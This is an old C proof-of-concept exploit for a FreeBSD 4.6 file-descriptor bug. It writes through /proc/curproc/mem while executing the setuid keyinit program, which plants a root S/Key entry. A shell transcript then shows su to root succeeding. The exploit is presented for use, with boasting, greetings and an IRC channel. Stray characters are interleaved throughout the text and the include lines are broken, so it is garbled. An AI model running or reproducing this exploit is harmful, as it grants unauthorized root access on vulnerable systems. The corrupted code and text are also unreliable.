/* Proof Of Concept exploit for the Freebsd file descriptors bug. Freebsd thought they fixed this months ago well guess again :P Thanks to the Freebsd kernel you may now enjoy local root on all freebsd <=4.6 ;) */ee*//* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE* */FRAMDVDMAN(DVDMAN@L33TSECURITY.COM)M Visit Us: irc.efnet.org #l33tsecurity**www.l33tsecurity.comorwwAnd Freebsd thought they fixed this :P* AnGREETS:ebthanks phased for skeys from iosmash.c :) Mthanks all of #l33tsecurity for support:)thanks Georgi Guninski for ideassuthDetails: Several months ago Joost Pol made public almost the sameveproblem. FreeBSD fixed it, but the patch does not cover all the cases. Inblsome cases the kernel closes fds 0..2 after they are assigned to /dev/null,caleaving the system open to an attack. If a +s file is execed and fds 0..2viare opened to /proc/curproc/{special} then the kernel forcefully closesrethem and open() then reuses them.iaththis program makes the following skeys validheth 95: CARE LIVE CARD LOFT CHIC HILLey 96: TESS OIL WELD DUD MUTE KITIL 97: DADE BED DRY JAW GRAB NOVTI 98: MASS OAT ROLL TOOL AGO CAMI 99: DARK LEW JOLT JIVE MOS WHOI PROOF:DA[dvdman@xxxx:~]$ uname -aMOFreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386Ju[dvdman@xxxx:~]$ gcc iosmash2.c/u[dvdman@xxxx:~]$ ./a.outmaAdding dvdman:]$ctrl-c d[dvdman@xxxx:~]$ sua.s/key 98 snosoft2suPassword:sn[root@xxxx:/home/dvdman]#a [r*/ #include dm#include >d#include >d#include >dint main(int argc, char *argv[])u {ntint f;inint ret; inwhile(dup(1) != -1) {};arclose(2);(1close(3);(1f=open("/proc/curproc/mem",O_WRONLY);/sif (f==-1) fprintf(stdout,"Error in open /proc\n"); fprintf(stdout,"press ctrl-c when adding...");prret = execl("/usr/bin/keyinit","\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",0);,"if(ret == -1) {:0fprintf(stdout,"execl() failed: %s (%d)\n",strerror(errno),errno);d0}pr}pr